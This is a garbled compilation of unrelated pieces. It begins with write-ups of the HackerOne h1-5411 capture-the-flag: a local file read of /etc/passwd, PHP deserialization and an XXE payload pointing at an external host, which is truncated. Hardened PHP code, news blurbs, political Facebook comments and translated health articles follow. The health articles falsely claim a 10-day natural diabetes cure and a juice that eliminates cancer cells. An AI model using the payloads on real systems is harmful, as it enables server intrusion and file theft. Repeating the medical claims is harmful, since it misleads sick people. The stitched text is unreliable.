    $this->template = $o->template;
    $this->type = $o->type;
}

This is promising because $this->config_raw gets passed into the vulnerable loadXML() function call and does not get overwritten with anything static. That means if we create an object that gets unserialized, we can specify the config_raw variable and it will execute our XXE payload.

We set up a test script by ripping out all the code involved in this attack chain, in order to test it locally with warnings enabled. Their server does not display any PHP errors or warnings, meaning we were completely blind to any roadblocks we ran into.

Here is a gist of the test code we were playing with:

https://gist.githubusercontent.com/ziot/e72c8c45865ea86d9c6aa6975615e839/raw/d0fb09a5a99be0c815c3e854e5b9900f2384b5dd/gistfile1.txt

Using the script above, we ran base64_encode(serialize(...)) on the newly created object after placing our XXE payload in config_raw.

Example:

class ConfigFile {
...
}
$test = new ConfigFile("asdf");
$test->config_raw = '<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "https://xs
Capturing the HackerOne Flag

by Daniel Abeles & Shay Shavit

HackerOne is a bug bounty platform that allows hackers around the world to participate in bug bounty campaigns initiated by HackerOne's customers. Recently, HackerOne announced they would be hosting a special live hacking event in Buenos Aires alongside a week-long security conference, Ekoparty 14.

In order to participate in the special event, you either have to be a top-ranked hacker on their platform or solve a challenge. Although we don't intend to fly from Israel to Argentina, challenges, especially capture the flag (CTF) challenges, really excite us.

We heard about the CTF from HackerOne's tweet, and immediately set our sights on the prize. The CTF started from the tweet itself, which contained an image with a QR code:

The QR code represented the following string:

The characters looked familiar, and we immediately suspected they were URL-encoded bytes, so we inserted a '%' before every pair of characters:

%68%74%74%70%73%3a%2f%2f%68%31%2d%35%34%31%31%2e%68%31%63%74%66%2e%63%6f%6d

We decoded the string using Burp Suite's decoder to reveal the URL (https://h1-5411.h1ctf.com):

From there, we started exploring the website:

The website was a meme generation service. To test it, we picked a template from a closed set of images and created our own meme. The feature was presented on the following page:

The page allows users to choose between text and image memes; after entering the top and bottom text, we hit the GENERATE button and the image/text was shown at the bottom.

Once a meme is generated, it is added to a list of memes stored in the session. All the memes are reflected on the "memes.php" page.

We took a closer look at the generation request and noticed that the response contained a JSON string with the local meme path on the remote server (we couldn't control the "meme_path" value, since it was auto-generated by the server).

We tried to manipulate some fields with no success. We thought the "template" field might be vulnerable to Local File Inclusion since its URL indicated it was a file. Instead of supplying a template, we tried to pull the "/etc/passwd" file. Success!

After we validated the vulnerability, we had the ability to reflect local files from the server to the memes page. Using this vulnerability, our next step was to pull the website's source code. We started by pulling the "index.php" file:

Once we had succeeded in pulling "index.php", we iteratively pulled every PHP file referenced in the source code, resulting in an almost full dump of the site. Some code was not pulled with this method, since it was not referenced from other pages:

We examined the source code, and the "headers.php" file caught our attention. It had two lines commented out, the import and export memes PHP files, which looked like they belonged to version 2.0 of the site:

These pages were still available on the website:

We inspected the "export" functionality. A brief examination of the export function showed that it lets you download your entire meme collection in a "memepak" format. We opened the file, which contained base64-encoded data of a PHP serialized array:

This immediately gave us a hint that we might be facing a deserialization vulnerability. One method of exchanging data between a client and server is object serialization. When the client requests a programmatic resource, the server can turn that resource into a string (serialization) and hand it over to the client. The process also works in the opposite direction: creating an object from a string is called "deserialization".

In PHP, in order to unserialize an object, the interpreter must know the class definition; this meant we could only serialize primitives (like integers) or defined types (arrays, custom classes).

Besides knowing the classes, we needed to meet two objectives to complete a successful deserialization attack:

Have some sort of control over the data that is fed into the class

A sink function (magic method) that references the input data and is triggered natively by the runtime (like "__toString", "__construct", etc.).

On the "classes.php" file we extracted before, we found 3 defined classes:

Template

Maintenance

ConfigFile

The Maintenance class was commented out, with a comment stating it belonged to an internal service, which made it a dead end.

The ConfigFile class was the most interesting, since it contains the "__toString" magic method. "__toString" executes the parse function, which parses XML with external entities enabled, and that could lead to an XML External Entity (XXE) processing vulnerability.

In the process of parsing the XML, the parser goes through the input and reaches an external entity. It then tries to retrieve the content of the entity. This can expose the application to various risks, such as information disclosure, server-side request forgery and internal network port scanning, among other issues.

Since the "ConfigFile" class seemed like a good entry point, we chose it as the class to serialize. To exploit the deserialization vulnerability, we needed to find where the serialization method was invoked. The code showed that the content being serialized is the memes array stored in the session:

The deserialization phase occurs in the import function, when uploading a new "memepak" file. The function first validated that we had uploaded a file, then read its content, base64 decoded it, and sent it to the
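Both write-ups above reach the same three defects: the template name used as a path (the LFR), unserialize() on an uploaded memepak, and loadXML() with LIBXML_NOENT | LIBXML_DTDLOAD in ConfigFile::parse(). As an added example, not code from either team or from the challenge, here are hardened counterparts in PHP; TEMPLATE_DIR, the function names and the JSON memepak format are assumptions for this illustration.

```php
<?php
// Added example, not the challenge's code: hardened counterparts to the three
// weaknesses. TEMPLATE_DIR, function names and the JSON memepak format are assumed.
declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';   // fixed template directory (assumed)

// A template is referenced by bare file name only: no slashes, no NUL, known extension.
function isSafeTemplateName(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\.(txt|jpg|png)\z/', $name) === 1;
}

// LFR fix: the "template" value is never used as a path directly. After the allow-list
// check, the resolved path must still sit inside TEMPLATE_DIR (also defeats symlinks).
function resolveTemplate(string $requested): ?string
{
    if (!isSafeTemplateName($requested)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $requested);
    if ($base === false || $path === false) {
        return null;   // directory or file does not exist
    }
    // realpath() strips trailing slashes, so compare against "$base/"
    return strncmp($path, $base . '/', strlen($base) + 1) === 0 ? $path : null;
}

// Deserialization fix: the memepak stays a base64 blob, but the payload is JSON, not
// serialize() output, so no object is ever instantiated; every meme is four strings.
function importMemes(string $upload): ?array
{
    $decoded = base64_decode($upload, true);
    if ($decoded === false) {
        return null;
    }
    $memes = json_decode($decoded, true);
    if (!is_array($memes)) {
        return null;
    }
    $clean = [];
    foreach ($memes as $meme) {
        if (!is_array($meme)) {
            return null;
        }
        foreach (['template', 'type', 'top_text', 'bottom_text'] as $field) {
            if (!isset($meme[$field]) || !is_string($meme[$field])) {
                return null;
            }
        }
        if (!isSafeTemplateName($meme['template'])) {
            return null;   // an imported meme may not smuggle in an arbitrary path
        }
        $clean[] = [
            'template'    => $meme['template'],
            'type'        => $meme['type'],
            'top_text'    => $meme['top_text'],
            'bottom_text' => $meme['bottom_text'],
        ];
    }
    return $clean;
}

// XXE fix for ConfigFile::parse(): drop LIBXML_NOENT and LIBXML_DTDLOAD, add
// LIBXML_NONET, and refuse any document that declares a DTD or entity at all.
function parseConfig(string $xml): ?array
{
    if (preg_match('/<!(DOCTYPE|ENTITY)/i', $xml) === 1) {
        return null;
    }
    $dom = new DOMDocument();
    $previous = libxml_use_internal_errors(true);   // collect parse errors quietly
    $loaded = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$loaded) {
        return null;
    }
    $o = simplexml_import_dom($dom);
    return [
        'top_text'    => (string) $o->toptext,
        'bottom_text' => (string) $o->bottomtext,
        'template'    => (string) $o->template,
        'type'        => (string) $o->type,
    ];
}

// Constructed inputs for a local run: a JSON memepak, a serialize()-style blob
// (not JSON, so rejected), a plain config, and one that carries a DTD.
$jsonPak = base64_encode(json_encode([[
    'template' => 'template4.txt', 'type' => 'text',
    'top_text' => 'test', 'bottom_text' => 'test',
]]));
var_dump(importMemes($jsonPak));
var_dump(importMemes(base64_encode(serialize(['template' => 'template4.txt']))));
var_dump(parseConfig('<config><toptext>test</toptext><type>text</type></config>'));
var_dump(parseConfig('<!DOCTYPE r [<!ENTITY x "y">]><config><toptext>test</toptext></config>'));
```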
Illinois braces for another Russian attack on its election systems
The frontline in the war between foreign hackers and U.S. election officials is an office in a Springfield, Illinois strip mall.
Russian hacker extradited to the US by the Czechs sent for psychiatric evaluation
A US court has referred Yevgeny Nikulin, a Russian citizen charged with hacking activity, for psychiatric evaluation; Prague extradited him to the United States this spring.
[OGR-28] hit parade for week 41
Replies: 4. Last poster: KuuKe at 10-10-2018 05:53. Topic is open. [OGR-28] hit parade for 9 October 2018.
11 ways to lose excess weight without exercise

Everyone would like to find a way to lose weight without exercising. While exercise and dietary changes are the best ways to lose weight, you can shed kilograms without making much effort to change your lifestyle. Combine these easy changes to your habits to lose weight more effectively. If you add exercise, you will see even greater results.

11 ways to lose excess weight without exercise:

1. Change your meal times
When you are trying to lose weight, it is a great idea to stop eating 3 hours before bed. For example, if you go to bed at 11:00, stop eating at 8:00. Your digestion will be more efficient, and you won't have extra calories sitting in your stomach when you go to bed.

2. Use smaller portions
Our portion sizes have skyrocketed as our plates have grown larger. It makes sense to cut portion sizes. We eat with our eyes first. You will feel more satisfied with these smaller portions if you eat from a smaller plate.

3. Give up fast food and takeaway completely
Don't eat anything from fast-food restaurants. This is one of the simplest lifestyle changes that requires no exercise to lose weight. Refined sugar, white bread, fatty meat and unhealthy toppings will derail your diet.

4. Slow down
When you eat, slow down and chew your food thoroughly. When people eat quickly, they are more likely to gain weight. When you eat too fast, your brain does not have time to send the signal that you are full.

5. Whole grains and fiber
Replace all your white bread and pasta with whole grains. These foods are lower on the glycemic index, which means they will not raise your blood sugar as much as their refined cousins. They also contain added fiber.

6. Protein
According to a 2005 study in the American Journal of Clinical Nutrition, a diet with 30% protein helped burn 441 calories a day. After 12 weeks, they saw an average weight loss of 5 kilograms without training.

7. Remove junk food from your diet
It is better not to keep junk food in the house, but if it is there, keep it out of reach. If you don't see it constantly when you are in the kitchen, you will be far less likely to indulge. Keep healthy snacks such as fruit and vegetables in sight.

8. Stay well hydrated
A 2010 study in the journal Obesity found that drinking water before a meal reduced the amount of food people ate at each meal. Water helps your stomach feel full. It is worth drinking for your own good, but it is especially useful for weight loss.

9. Don't watch TV while eating
If electronic devices such as the TV or computer are regularly on during meals, try turning them off. According to a study published in an American journal in 2013, people who are distracted by electronics eat 10% more than people who keep their devices off.

10. Give up all sugary drinks
One of the simplest ways to shed kilograms without exercise is to stop drinking sugary beverages. Juice, sweetened drinks such as coffee and tea, and sodas are high-calorie culprits. Instead, drink unsweetened beverages such as green tea, coffee and water.

11. Eat 4 times a day
Don't restrict your calories so much that you feel hungry throughout the day. Eat healthy food between meals. Vegetables, whole-grain crackers and protein are excellent choices. You should aim to eat 4 times a day.

Source
Translation and adaptation: Fithacker
Photo: g2.delphi.lv

7 early warning signs of cancer in the body that should not be ignored

In cancer, uncontrolled cell growth occurs in the body; it appears when the normal restraining mechanism does not work as expected, which can lead to the formation of new, abnormal cells without the old ones being recycled.

The continuous formation of new cells overwhelms the old cells, forming a large mass of tissue called a tumor. As a rule, this is not an instantaneous process and takes a long time. While this is happening inside your body, it will try to tell you that something is going wrong through various warnings. So, to help you, we have listed 7 warning signs of cancer that you should not ignore, and if you suffer from any of the signs listed below, it is strongly recommended that you get checked by your doctor.

7 early warning signs of cancer in the body that should not be ignored:

1. Lumps forming on your body:
Lumps often form by chance in different places on your body; many of them disappear over time, but some remain no matter what you do to treat them. These lumps could be one of the first warning signs that cancer cells are forming in masses of tissue. If you have any strange lump on your body, you should go straight to your doctor to have it checked as soon as possible.

2. Cough or dry throat:
Coughing is quite common because of colds and flu, which are the most frequent illnesses. However, on average, cold and flu symptoms disappear completely within a week. But if you face the problem of a persistent cough and dry throat, it may be a symptom of throat cancer, thyroid cancer or lymphoma. So, in such a situation, you should see a doctor without wasting time.

3. Persistent fever or infections:
If you suffer from fever and other infections quite often, it may be a sign of leukemia, or blood cancer. Blood cancer is one of the most dangerous types of cancer and cannot be treated unless it is detected at an early stage.

4. Fatigue:
This may be one of the most common symptoms of any type of cancer and usually occurs quite often. If you frequently feel weak and tired, even after eating healthily, you should go and see a doctor for further tests. These symptoms are looked at together with other symptoms to determine the type of cancer.

5. Trouble swallowing food:
If, while eating or drinking, you feel very uncomfortable and cannot swallow food properly, this is one of the symptoms associated with throat cancer. The formation of cancer cells in the throat makes it congested, which causes problems when consuming food or water. Often this difficulty is caused by other factors and disappears on its own. But if it does not, see a doctor.

6. Change in bowel habits:
Bowel movements can change for many reasons depending on the type and amount of food you eat and the medications you take. Many people often experience changes in the frequency and size of their bowel movements and pay no attention to these small symptoms. But they are not entirely insignificant and may be a sign of colon cancer.

7. Blood in the urine:
Many people suffer from UTIs, or urinary tract infections, which are most common in women. However, men can also face this problem. If someone has a UTI, they may see that their urine is red and often feel pain when urinating. A UTI is completely curable. But if, even after taking all the right medications, blood still appears in the urine, you may be at risk of developing prostate, bladder or kidney cancer.

Source
Translation and adaptation: Fithacker
Photo: healthline.com

How to cure diabetes naturally at home in just 10 days

Diabetes occurs when the organ responsible for producing insulin starts making less or more insulin than the body requires. These conditions need to be managed properly, and that is the only way to live a better and healthier life.

Causes of diabetes:
There are several causes of diabetes. Some of them are listed below:

1. Family history of diabetes:
Yes, there is a chance that you will develop diabetes if your relatives and family members also have diabetes.

2. Pancreatic diseases:
Pancreatic diseases can delay insulin production. Hence diabetes.

Common symptoms of diabetes are:
- your skin itches and your mouth feels dry;

- sometimes, when the body lacks fluid, the eyes also lack moisture; in this state the lenses of the eyes begin to swell, lose their ability to focus on objects, and vision becomes blurred;

- urination also brings ketones into being. Ketones are found to be dangerous, as they cause life-threatening conditions; when ketones are produced in the body they can make you feel ill and you may experience nausea.

So, knowing the common symptoms that come with diabetes, let's move on to the remedy that can help you kill diabetes forever in 10 days.

Hibiscus leaves: a remedy for diabetes:

Ingredients:
hibiscus leaves
clean drinking water

Simple preparation steps:
Take the hibiscus leaves and wash them with water.
Take drinking water and put the hibiscus leaves in it.
Use a coffee grinder to grind the leaves and mix them into the water.

Collect the paste and keep it.

Now you can add 4 tablespoons of the paste made by grinding the hibiscus leaves to half a glass of drinking water and stir.

Leave this mixture overnight.

In the morning, drink it on an empty stomach.

Repeat this process in the evening.

Important point:
Do not skip a single dose of this remedy.

Follow the treatment strictly for 10 days.

This remedy only works if the schedule is strictly followed.

Source
Translation and adaptation: Fithacker
Photo: dekorativnye.ru

How to check whether honey is pure or fake. Use this simple trick!

Honey is considered an ancient remedy used in several health and beauty treatments. Honey is a treasure trove of various nutrients and minerals that are very beneficial for your health and well-being, as well as for a long and healthy life.

Honey has antibacterial and antiseptic properties that are useful for treating many beauty problems. It works as a natural cleanser and gives you a healthy skin tone. But finding original, pure honey is not so easy. Fake honey is often found on the market and looks quite real, but has no effect.

Honey is good for health. It contains vitamins, iron and other minerals. Honey is rich in a large number of minerals that are good for digestion and for the body as a whole. But we need pure honey, and here we will tell you how to distinguish real honey from fake.

We should check:

1. The solid state of honey:
This is one of the simplest ways to determine the purity of honey. Look at the bottom: if you see a crystalline form at the bottom, you can be sure your honey is pure. For more convenient and faster results, you can put the honey in the refrigerator; if it still remains liquid, you can be sure it is fake and you should not use it.

2. Read the label correctly:
Every time you buy honey, read the label and ingredients carefully. Make sure the honey's ingredient list does not contain high-fructose corn syrup or glucose. These 2 substances are usually added to food to keep it from thickening.

3. The thumb test:
Drip honey onto your thumb. If you feel it spreading, it is not real honey; if it stays on your thumb, it is pure honey. Always remember that pure, original honey is a little thicker. Fake honey, on the other hand, looks watery.

4. The water test:
Take a glass of water and add one tablespoon of honey to it. If the honey is not pure, it will dissolve in the water.

5. The flame test:
Everyone should know that organic honey is flammable. Take a dry match, dip it in honey and strike it against the matchbox. It will burn if the honey is pure. If it is impure, the flame will not burn, since impure honey contains moisture.

6. The blotting paper test:
Put some honey on blotting paper; if it is impure, it will be absorbed by the blotting paper. Pure honey is not absorbed.

No honey should be diluted with sugar syrup.
Honey is a supersaturated sugar solution. Honey contains 18% water, which is not enough for it to freeze.

Honey has energy, it has calories. Anyone who wants to lose weight should add honey to water or milk. There is no fat in honey. It is stored in liquid form, is not heated and is not filtered. You can find honey in various forms on the market.

Raw, natural honey crystallizes. This is because of glucose crystals. Thus, it is pure.

Source
Translation and adaptation: Fithacker
Photo: images.aif.ru

10 amazing benefits and uses of almonds

Everyone loves eating nuts, because they are tasty and have many health benefits.

In this article we are going to present 10 amazing benefits and uses of almonds.

1. Almonds contain a lot of fiber and other nutrients:
Almonds are very rich in fiber and other essential nutrients such as protein, magnesium, potassium, etc. The almond is essentially a tree nut, and it contains more fiber and protein than any other nut. If a person regularly eats 10 to 15 almonds a day, they can make up for a deficiency of such nutrients.

2. Almonds are a rich source of antioxidants:
Almonds have a large amount of antioxidants, which are essential for the human body. Antioxidants strengthen your immune system and remove all toxins from your body. And you will be interested to learn that the brown outer layer of the almond contains a large amount of antioxidants, so, if possible, eat almonds with the brown skin on. The right amount of almonds in a day will fill you with the necessary components and help reduce stress.

3. Almonds are rich in vitamin E:
Vitamin E is a useful component for your body, hair and skin. By one estimate, the almond is one of the richest nuts in vitamin E. Regular consumption of almonds can have a huge impact on your health, including heart health, blood sugar levels, healthy skin and hair, and weak eyesight.

4. Almonds help control sugar levels:
If you have diabetes, you should eat almonds on an empty stomach. They contain a large amount of magnesium, which boosts the body's metabolic rate and improves your body's insulin system.

5. Almonds are effective for blood pressure and cholesterol:
Once again, magnesium is useful for controlling the body's blood pressure and cholesterol levels. Low magnesium levels have been responsible for increased blood pressure and bad cholesterol, but almonds have the necessary amount of magnesium, so 12-15 pieces a day can bring many healthy and positive changes to your body.

6. Almonds are useful for weight loss:
Almonds are rich in protein and low in carbohydrates, so if you are looking to lose weight, almonds can help you. The right amount of protein and fiber makes you feel full, and you will not feel hungry again and again.

7. Almonds are a magic nut during pregnancy:
If you are pregnant and want a healthy and smart baby, start eating almonds. Almonds have all kinds of benefits available for both the baby and the mother. The healthy nutrients and vitamins in almonds provide sufficient minerals and components. You can eat soaked almonds or an almond shake with honey and milk.

8. Almonds stimulate the brain:
Again, remember your mother's or grandmother's advice to eat almonds to be wise. 8-10 soaked almonds a day help stimulate the brain and the nervous system. So if you are a growing child, you should start eating almonds on a regular basis.

9. Almonds are good for heart health:
Almonds have this ability: they can give you a healthy heart. They contain potassium and magnesium, which help lower LDL cholesterol levels and also control blood sugar levels.

10. Almonds are great for relieving constipation:
Foods that are rich in fiber can solve the problem of constipation. If you have chronic constipation, include almonds in your regular diet. Almonds contain a rich amount of fiber, which is important for improving the digestive system. Ground almonds are useful for treating constipation. It would be good if you did not use dried almonds.

Source
Translation and adaptation: Fithacker

Miracle drink: beetroot, apple and carrot eliminate cancer cells

Today in this article we present you a wondrous drink. It consists of carrot, beetroot and apple. All of these ingredients are very powerful and can help you manage and prevent many kinds of diseases.

Let's learn about some of the health benefits you can get from drinking this miraculous drink.

Benefits of drinking this wondrous drink:
1. This drink will prevent the development of any type of cancer cells in your body.

2. This miracle drink can prevent diseases of the liver, kidneys and pancreas, and it can be used to treat ulcers.

3. Good news for patients with high blood pressure and lung problems. This drink can help manage high blood pressure, and it can also strengthen the lungs and prevent a heart attack.

4. Drinking this drink will improve the overall condition of the immune system.

5. This drink will improve your vision. If you can drink it regularly, it can help you get rid of red eyes and dry eyes.

6. It can help relieve muscle pain. If you go to the gym, this drink can be a good choice as a painkiller.

7. This magical drink removes toxins from the body. It also helps with bowel movements and prevents constipation.

8. This drink also improves digestion, prevents bad breath and prevents any throat infection.

9. It reduces menstrual pain to a great extent.

10. This drink can prevent a hay fever attack.

Required ingredients:
one apple
one beetroot
one carrot.

Simple preparation steps:
1. Take the apple, beetroot and carrot and peel them.

2. After that, cut them into smaller pieces so that they can easily be crushed and their juices extracted.

3. Now, one by one, start putting the pieces of carrot, beetroot and apple into the blender and extracting their juices into a bowl.

4. You can add lemon or lime for a refreshing flavour.

5. Now drink it immediately for the best and fastest results.

How to drink it:
Drink it half an hour before a tasty breakfast.
You can also drink it twice a day, once in the morning and once in the evening, for immediate and faster results.
After two weeks of use, you will notice many changes in your health.

Source
Translation and adaptation: Fithacker
Photo: edinstvennaya.ua




5 warning symptoms of dementia

"Can I pinpoint exactly when I 'lost' my husband? Was it the moment I had to tie his shoelaces? Or when we stopped laughing with each other? Looking back, that turning point is impossible to pin down. Such is the nature of dementia." (Judy Parfitt, English actress)

Like most diseases that seriously affect cognitive functioning, dementia is a tragic, agonising condition. In this article we will discuss what dementia is, some warning signs of the disease, and treatment methods.

What is dementia?
According to the Alzheimer's Association, dementia is "a general term for a decline in mental ability severe enough to interfere with daily life". Memory loss is one example, and Alzheimer's disease is the most common form of dementia. Dementia is, as a rule, a gradual decline in memory, thinking and reasoning.

Types of dementia
As mentioned, Alzheimer's disease is the most common form of dementia, accounting for 60 to 80 percent of all cases. Alzheimer's is a fatal disease that destroys brain cells and cognitive function.

The second leading cause of dementia is vascular dementia, a form of dementia that follows a stroke.

The Mayo Clinic describes a stroke as follows:
"A stroke occurs when the blood supply to the brain is interrupted or reduced. This deprives your brain of oxygen and nutrients, which can lead to the death of your brain cells. A stroke may be caused by a blocked artery (ischemic stroke) or the leaking or bursting of a blood vessel (hemorrhagic stroke)."

What dementia is not
As mentioned, dementia is a complex disease; nevertheless, ignorance has led people to think it is strictly an age-related problem, which it is not.

Dementia is often wrongly referred to as "senile" dementia, reflecting the once widespread but mistaken belief that serious mental decline is a normal part of ageing. Changes in memory often (not always) occur as we age.

The main difference between any "age-related" memory problems and dementia is the degree to which daily life is affected. Everyone forgets something or experiences acute bouts of "brain fog" at some point. Many people have memory and thinking problems, but that does not mean they have dementia.

Given the complexity of the topic, we advise anyone who experiences cognitive problems, or knows someone who does, to seek medical help.

Here are 5 signs of dementia:

1. Difficulty planning or solving problems
Some people with dementia experience sudden changes in their ability to develop and follow a plan. Simple tasks, such as keeping track of bank balances or following a recipe, become much harder.

2. Trouble with once-familiar tasks
One of the most noticeable signs of dementia is a declining ability to perform routine tasks. A person may be unable to navigate a familiar route, or may forget how to play a favourite game. As a rule, doing something familiar is a deeply ingrained neural activity that can be completed "without thinking". Any noticeable change in someone's ability to perform common tasks deserves attention.

3. New problems with communication
People with dementia often have trouble with conversations. They may stop engaging, forget something they said (perhaps repeating themselves), or have no idea how to proceed. Vocabulary problems are also common, such as being unable to find the right word.

4. Withdrawal from social or work activities
When a person begins to experience the cognitive problems that dementia brings, they may withdraw from work or social activities. Part of this withdrawal may be due to personality changes, fear or denial. Whatever the reason, some dementia sufferers become increasingly distant.

5. Memory loss in daily life
Again, the key phrase is "for daily life". Memory lapses happen to all of us, but rarely, if ever, do such lapses significantly disrupt our day. In the early stages of dementia, forgetting recent information is one of the most universal signs of the underlying disease.

Other noticeable signs of serious memory problems:
— forgetting important dates or events
— repeatedly asking for the same information as before
— growing dependence on others to remember things

Conclusion

The Alzheimer's Association offers six key recommendations for preventing dementia:
— stop smoking
— keep your blood pressure, cholesterol and blood sugar under control
— eat a healthy, balanced diet
— exercise
— maintain a healthy weight
— limit alcohol consumption.

Source
Translation and adaptation: Fithacker
Photo: mguu.ru




Fake News
--------

Ron Cutrera shared a video. October 6 at 1:37 PM
-------
https://www.youtube.com/watch?v=3KMfETp5w3w

Definitive Proof That Kavanaugh Lied
Facebook Watch
503,364 Views
The Young Turks — with Tom Morello.
Brett Kavanaugh was caught lying multiple times during yesterday's hearing. Get exclusive access to our best content. http://tyt.com/GETACCESS
--------
Comments
Lenda Yu Brewer fake responses by Kavanaugh, taken from the committee hearing.
--------
Lenda Yu Brewer he is actually quoted on his views of polygraph credibility yet now says he doesn't believe they are ....in his case. mmm. straight from the hearing responses this news outlet covers.
---------
Lenda Yu Brewer During the five days of the farce, we kept hearing from people desperate to speak to the FBI, including Ford. She was never interviewed. Neither was Kavanaugh. Neither were the scores of potential witnesses who tried to offer a clearer picture of what might have happened.
https://www.cnn.com/.../kavanaugh-fbi-probe.../index.html
--------
Thomas Williams

We are walking on the razor's edge of becoming a failed country that was once very strong socially but has descended into the Ivy League fanatical-minded culture that is creating this divided union of no return, instead of the perfect American union dream of our country's forefathers.

I always thought that women don't like weakness in a man or woman, but to the contrary, all I am seeing are groups of women wallowing in the weakness of rehashing a bad sexual experience from some time in their life. So who has not had a bad sexual experience of some kind, and why is that memory becoming the most important bad feeling in the life they are living today?

Frankly, I still don't like weakness in men or women from the past or present, you know what I mean.
---------
100PERCENTFEDUP.COM
CNN’s Brooke Baldwin had a hard time digesting the truth when she had Matt Lewis, columnist for The Daily Beast, on her show. They were discussing the Democrats and the leftist way to fight against things they don’t like, such as the Supreme Court confirmation of Judge Brett Kavanaugh, and that....

-------
And may all of their own mortal cold-hearted souls rot in hell.
--------
Thomas Williams and Bill Gordon shared a link.
CALIFORNIAFAMILY.ORG
Planned Parenthood has killed over 7.6 million babies since it legally began performing abortions in 1973 following the Roe v. Wade decision. That’s a catastrophic number. It’s easy to …
  • All those horrible evil people who did that are all very freaky creeps to me. And may all of their own mortal cold-hearted souls rot in hell.
--------
Our Lord God is truly a good person.
--------
Prince Onyeka Chiukwu Abiama
September 25 at 8:20 AM
CNN or BBC will not show you this one...they will only be showing you every negative thing about Donald Trump...just watch how Trump receives prayer every morning...God bless J Trump
--------
https://www.youtube.com/watch?v=a0_mCivoTSs

Faith leaders put hands on Trump and pray
--------
Thomas Williams - Our Lord God is truly a good person. With a divine love that we cannot imagine having the capacity to love everyone both sinner and innocent alike in the same way. How lucky can we be that all we need to do is be worthy?
-------
BUCHANAN.ORG
After a 50-year siege, the great strategic fortress of liberalism has fallen. With the elevation of Judge Brett Kavanaugh, the Supreme Court seems secure for constitutionalism — perhaps for decades.

--------
Dr. Ford is crackers.
--------
Ron Cutrera shared a link.

YOUTUBE.COM
Kavanaugh Accuser’s Husband Breaks His Silence, Exposes ‘Sick Issue’ His Wife Has Over the…

Comments
--------
https://www.youtube.com/watch?v=mHV1DjMCobk&feature=share

Kavanaugh Accuser’s Husband Breaks His Silence, Exposes ‘Sick Issue’ His Wife Has
--------
Security takes center stage at Google’s hardware event

Yesterday’s big Google news was the revelation that a software glitch in Google+ had left data from hundreds of thousands of users exposed. But today, Google is pushing a message of privacy. At its big hardware event in New York, Google executives repeatedly emphasized that security is baked into all of the company’s products.

“The big breakthroughs you’re going to see are not in hardware alone,” said Rick Osterloh, Google’s senior VP of hardware. “By combining Titan Security both in the data center and on devices, we’ve created a closed loop for your data across the Google ecosystem.” He then promised that there would be more talk of security efforts throughout the program.

Google Titan first emerged roughly a year ago as a homegrown chip to secure Google’s cloud. It debuted at the 2017 Cloud Next event in San Francisco as a meaty promise to protect enterprise client data. The chip allows Google to prevent unauthorized access at the processor level, and it also scans hardware for tampering. “It allows us to maintain a level of understanding in our supply chain that we otherwise wouldn’t have,” Neal Mueller, Google’s cloud marketing head, told Reuters last year.

Titan takes on new relevance in light of both the Google+ vulnerability and Bloomberg’s report that hackers are infiltrating big tech companies at the chip level. (Apple, Amazon, and the U.S. government have denied the substance of Bloomberg’s reporting, but the risk is real.)

While Google’s secure chips may have started in the cloud, they’re now embedded in the new gadgets the company announced today: the Pixel 3 smartphone, Pixel Slate tablet, and Google Home Hub smart display/smart-home controller. Of course, security has been a component of such devices before, but Google doesn’t often call it out so bluntly.

“We specifically did not put a camera on Home Hub,” said Diya Jolly, Google’s VP for product management, as she revealed the new device, which is a digital picture frame that can also read back calendar events, weather, and traffic reports (of course, it does search, too). Jolly said that Google recognized that people may not want cameras in the most private areas of their home, like a bedroom. But it was a strange call-out, since Google already puts cameras in your home through the Pixel phones and Nest Cam home-security cameras.

That’s why it’s always made sense for Google to stay away from positioning itself as a privacy advocate like Apple does, for instance. Fundamentally, it isn’t one. Regardless of the glossy product updates and push into hardware, Google still makes the vast majority of its money putting ads against gobs of user data. All these other products are essentially ventricles that feed into Google’s great body of user data. It not only sees everything you search for, it wants to handle the lock on your doors, the security cameras on your property, and the temperature of your domicile.

But the company can promise the information you share with it will remain secret—at least between you and Google. In August, Google launched a $50 multi-factor authentication key for consumers, a technology typically reserved for big enterprise and government workers. Even if Google wants to give this level of security to the masses, the problem is that people don’t want to make the effort to secure themselves: In January, at the Usenix Enigma security conference, a Google engineer told attendees that only 10% of Gmail users use two-factor authentication to make life harder for hackers.

The messaging at Google’s hardware event takes a different approach. The company is saying it’s focused on protecting your data—even if you aren’t.


Dear Lord, How can I die remembering her love while I'm still alive? A fate worse than death.
--------
Comments

Thomas Williams Oh! Now I like her music "not so much anymore"😥😥. ... https://www.youtube.com/watch?v=P5NjIt9Fh2s
---------
Thomas Williams - Oh my God, I'm going to die now. Because she did cry and I was so surprised at how deeply she felt... I can hardly stand remembering that moment now. So I only hope that there is a heaven for real where we can be that way again, Susan Marie. Forget about Taylor Swift.
--------
https://www.youtube.com/watch?v=V1bFr2SWP1I


OFFICIAL Somewhere over the Rainbow - Israel "IZ" Kamakawiwoʻole
--------
If Black America wants to really rebuild the inner city of America where they live, vote Republican and watch it happen.
-------
Comments
Chad Governale - So is he saying there are more lynch mobs than regular people for Trump to have been elected president? Just wondering
--------
Ron Cutrera Remember - this guy was one of Obama’s advisors. You are known for the company you keep.
--------
Thomas Williams - This guy is still the same bull-talking guy using the black American people's fears and social hatreds for his own vanity and political power. Come on black America, kick this political grifter Al Sharpton aside and out of your hair. What did he ever do for you except promise something he cannot deliver? Trump delivers. If Black America wants to really rebuild the inner city of America where they live, vote Republican and watch it happen.
-------
Episode 322: #NotMyInternet | TechSNAP 322
We discuss who really controls the internet & just how centralized and potentially vulnerable it has become. Plus the latest security letdowns from Windows 10, the story of a questionably ethical hacker & Zomato's data breach.

Plus some fantastic feedback, a robust roundup & so much more!

Episode 307: State Sponsored Audiophiles | TechSNAP 307

The details on the latest WordPress vulnerability, then the surprising, or perhaps not so surprising, takeover of a cybersecurity firm's website. And watch out: hackers may be using your microphone to steal your data!

Plus a packed roundup, your feedback & so much more!

Episode 238: Certifiable Authority | TechSNAP 238

TalkTalk gets compromised, Hackers make cars safer & Google plays hardball with Symantec.

Plus a great batch of your questions, a rocking round up & much, much more!

Episode 224: Butterflies & Backronyms | TechSNAP 224

